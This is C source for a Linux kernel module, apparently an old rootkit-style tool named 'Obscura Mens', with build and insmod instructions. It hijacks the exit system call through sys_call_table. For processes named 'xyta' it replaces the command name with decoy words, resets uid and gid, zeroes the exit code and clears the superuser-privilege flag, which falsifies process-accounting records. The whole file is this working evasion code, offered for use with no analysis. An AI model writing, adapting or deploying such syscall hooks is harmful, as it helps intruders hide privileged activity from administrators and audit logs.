/*
        Obscura Mens v0.1 - coded by bELFaghor - Thanks to FuSyS for idea
        "I wanna be a good boy", Ramones.

        . Compile it as following:
        gcc -O6 -Wall -DCONFIG_KERNELD -DMODULE -D__KERNEL__ -DLINUX -c obme.c

        . Insert and remove this module as following:
         insmod obme; rmmod obme
*/

#include <linux/kernel.h>
#include <linux/module.h>
#include <sys/syscall.h>
#include <linux/sched.h>

#define HCOMM   "xyta"
#define HUID    1000
#define HGID    100

extern void *sys_call_table[];

char *fhole[] = { "I", "wanna", "be", "a", "good", "boy" };
int i = 0;

asmlinkage int (*original_call) (long);

asmlinkage int our_sys_exit(long code)
{
        if(i > 5) { i = 0; }
        if(!(strcmp(current->comm, HCOMM))) {
                strcpy(current->comm, fhole[i++]);
                current->uid = HUID;
                current->gid = HGID;
                current->exit_code = 0;
                if((HUID != 0) && (current->flags & PF_SUPERPRIV)) {
                        current->flags ^= PF_SUPERPRIV;
                }
        return original_call(0);
        }
        return original_call(code);
}

int init_module()
{
        original_call = sys_call_table[SYS_exit];
        sys_call_table[SYS_exit] = our_sys_exit;
        return 0;
}

void cleanup_module()
{
        if(sys_call_table[SYS_exit] != our_sys_exit) {
                printk("shit something goes wrong :/\n");
                }
        sys_call_table[SYS_exit] = original_call;
}
